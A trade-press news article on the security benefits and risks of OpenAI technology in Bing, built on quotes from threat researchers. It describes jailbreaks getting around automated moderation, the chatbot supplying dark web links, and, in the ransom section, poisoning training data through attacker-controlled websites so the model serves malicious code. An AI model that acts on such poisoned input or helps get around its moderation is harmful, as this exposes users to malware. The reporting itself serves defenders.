Artificial Intelligence & Machine Learning , Next-Generation Technologies & Secure Development , Threat Intelligence

The Security Perks and Perils of OpenAI on Microsoft Bing

OpenAI on Bing Carries Code and Traffic Risks But Will Also Simplify Code Analysis
The Security Perks and Perils of OpenAI on Microsoft Bing

Embedding OpenAI technology into Microsoft's Bing search engine will help both hackers and cyber defenders, threat researchers say.

See Also: Take Inventory of Your Medical Device Security Risks

On one hand, OpenAI on Bing could make it easier for hackers to drive traffic to malicious websites, get around search engine blocking, dump malicious code on unsuspecting users and negotiate ransoms. But on the other hand, experts say, OpenAI on Bing will simplify code analysis for cyber professionals and make search engines a source of meaningful, up-to-date information for threat intelligence analysts.

"I do think the positives will outweigh the negatives over time as OpenAI and its platforms get better not only in terms of its sample size and the technology itself, but also in terms of moderation," Alexander Leslie, associate threat intelligence analyst at Recorded Future, tells Information Security Media Group.

Microsoft on Feb. 7 revealed to great fanfare a preview of new versions of its Bing search engine and Edge browser that leverage OpenAI technology. On Feb. 17, Microsoft said it would limit conversations with the new chatbot in its Bing search engine to five questions per session and 50 questions per day after the chatbot started giving unusual and creepy responses during extended conversations.

The Seattle-area software and cloud giant loosened its restrictions slightly four days later, raising the limits to six questions per session and 60 questions per day. At the end of a session, Microsoft will require users to wipe away their chat history before starting a new conversation. Microsoft declined an ISMG interview request on the security implications of embedding OpenAI technology into Bing.

What does the latest manifestation of OpenAI mean for cybersecurity? Here's what industry experts have to say (see: Yes, Virginia, ChatGPT Can Be Used to Write Phishing Emails).

How OpenAI Could Simplify Code Analysis for Defenders

In the long term, Leslie expects the positives of OpenAI on Bing to outweigh the negatives since users can get more tailored, accurate and timely results than with search engines lacking AI. Cyber professionals have to sift through tons of content from code repositories and threat intelligence feeds to databases of indicators of compromise, and OpenAI on Bing should make the job easier by simplifying the search.

Google and Bing today aren't great sources for threat intelligence professionals since the results aren't specific or timely enough, but Leslie says OpenAI's ability to generate tailored results could change that. Using search engines rather than third-party tools as a source of information will maximize convenience for cyber professionals while saving them time and money, according to Leslie.

In addition, the version of OpenAI embedded in Bing will be far more current than the stand-alone, web-based version of ChatGPT - which is indexed to late 2021 - meaning that security researchers could use OpenAI integrated with Bing to do code analysis, says CyberArk Principal Security Researcher Eran Shimony.

Shimony expects OpenAI in Bing will help defenders cover more ground so there aren't as many opportunities for hackers to hit an organization. He also expects the number of algorithms connecting OpenAI and Bing to increase as usage accelerates, and he would eventually like to see OpenAI and Google's advanced AI products work together to create better and more secure code.

"As these platforms get better, as the technology gets better, as the sample size gets better, cybercriminals will increasingly find there to be little use for AI tools."
– Alexander Leslie, associate threat intelligence analyst, Recorded Future

Legitimate actors, however, have to be hesitant when it comes to entering corporate information into OpenAI on Bing, says Sergey Shykevich, threat intelligence group manager at Check Point. A big enterprise with lots of proprietary code wouldn't upload anything sensitive into OpenAI on Bing since the search engine could spit out the same code in response to a question from a competitor.

Hackers, however, don't share any of those same concerns, Shykevich says. In fact, they'd love nothing more than for OpenAI on Bing to feed malicious code to unsuspecting users.

How OpenAI Could Drive Traffic to Malicious Websites

Threat actors have begun conversations in dark web forums about abusing the OpenAI technology in Bing for malvertising and to drive traffic to malicious websites, says Recorded Future's Leslie. He says search engine-based malvertising is the primary way to spread info stealer malware, single-extortion ransomware and remote administration tools.

Templates and queries within OpenAI can enable searches, articles or domain names to become more detectable in search engines, and Leslie says adversaries can capitalize on this by using typosquatted domains and scrapping content from legitimate sources and mirroring that to their own illegitimate sites. Hackers can therefore use OpenAI embedded in a search engine to assess the effectiveness of their malvertising.

Threat actors must mirror content that's downloadable in order for their attack vectors to propagate in a search, and they often end up targeting Microsoft or Adobe products. Traditional search engines are very effective at flagging and blacklisting the vast majority of malicious sites, but with OpenAI, threat actors might find it easier to propagate these malicious ads as suggested results at the top of the search page.

Although no proofs of concept have been developed yet, threat actors want to use the new chatbot function embedded into Bing to drive traffic to traditional dark web sources and cybercriminal forums where breaches and exploits are being discussed, Leslie says. ChatGPT represents an easy way to get around search engine blocking since it's still willing to provide users a direct link to dark web forums, Leslie says.

Why Human Moderation for OpenAI Isn't Feasible

Getting ChatGPT to no longer provide direct links to cybercriminal or malicious sources will require both automated and community-related moderation since humans are needed to fine-tune results. Malware development, phishing and offensive and illegal content can be spotted automatically, but researchers and threat intelligence analysts familiar with the sources used by cybercriminals say more monitoring is needed.

"We've already seen threat actors find out ways that they can jailbreak ChatGPT, OpenAI and chatbots like this to work around automated moderation," Leslie says. "The automated moderation has to be supplemented by human moderation because, at this moment, there are a number of workarounds that allow you to get results that should probably be flagged."

But as social media platform providers have found, human moderation is nearly unfeasible from a scalability perspective since it would require people working incredibly long hours at low wages, Leslie says. He adds that a more effective mitigation strategy might be requiring account verification in order to use search engines powered by artificial intelligence.

Blocking IP addresses associated with China or the Commonwealth of Independent States from getting accounts with OpenAI and subjecting phone numbers based outside the United States to more checks will stop most adversaries from abusing ChatGPT or other OpenAI platforms. Dark web forum chatter indicates many threat actors are stuck on waitlists and have had their email address or phone number flagged.

ChatGPT and other artificial intelligence platforms have lowered the barriers to entry for less-skilled threat actors and cybercriminals without technical skills, but better and more robust moderation has resulted in more of their requests getting flagged or outright refused. As the technology and moderation continue to improve AI capabilities, Leslie says the positives will outweigh the negatives (see: Nikesh Arora: ChatGPT Best Thing That's Happened to Security).

"The door for abuse is going to close soon," Leslie says. "I don't know if that is within the next few months or the next few years. But I do believe that - as these platforms get better, as the technology gets better, as the sample size gets better - cybercriminals will increasingly find there to be little use for AI tools."

How OpenAI Could Help Hackers Negotiate Bigger Ransoms

Another risk centers around making ChatGPT learn incorrect data at scale so that it outputs malicious code, CyberArk's Shimony says. Since ChatGPT offers responses based on the datasets it has learned, it could be directed to take code from an array of websites all controlled by a single threat actor and then offer that code in response to queries from benevolent users, he says.

Since code is just text and doesn't require redirecting ChatGPT to a malicious website, Shimony suspects it's easier to poison a dataset with malicious code that it would be to trick an AI-powered search engine into providing users with malicious links. The implications of poisoning datasets are very severe since customers could put malicious code in their systems if they automatically take whatever ChatGPT spits out.

Shimony isn't sure how easy or difficult it would be for an adversary to poison a dataset, but he says it's definitely an angle CyberArk is looking into. Adversaries can use ChatGPT to create polymorphic code - which mutates to change the instruction order associated with the algorithms - and Shimony expects adversaries will tap into machine learning-based AI to create sophisticated polymorphic campaigns.

ChatGPT doesn't currently have good integrations with libraries or public code repositories that have been updated over the past year, but it's a whole different story when it comes to OpenAI on Bing, says Check Point's Shykevich. OpenAI can query for new libraries in real time in Bing as well as other locations, which he says will make developing code easier for hackers.

In addition, the quality of phishing messages generated by embedding OpenAI in Bing will be much better since the artificial intelligence engine can learn from real email input into or sent through Bing, Shykevich says. And since OpenAI in Bing is up to date, threat actors can use it to strengthen their hand during ransomware negotiations, he says.

For instance, Shykevich says, threat actors could update their negotiations with a public company victim based on real-time financial information they're getting through OpenAI on Bing around how the attack has affected the company's stock price. This will streamline what was previously a manual process and put threat actors that can't afford professional ransomware negotiators on a more equal playing field.

"Like any good idea and good technology, it's got people trying to abuse it," Shykevich says.


About the Author

Michael Novinson

Michael Novinson

Managing Editor, Business, ISMG

Novinson is responsible for covering the vendor and technology landscape. Prior to joining ISMG, he spent four and a half years covering all the major cybersecurity vendors at CRN, with a focus on their programs and offerings for IT service providers. He was recognized for his breaking news coverage of the August 2019 coordinated ransomware attack against local governments in Texas as well as for his continued reporting around the SolarWinds hack in late 2020 and early 2021.




Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing careersinfosecurity.com, you agree to our use of cookies.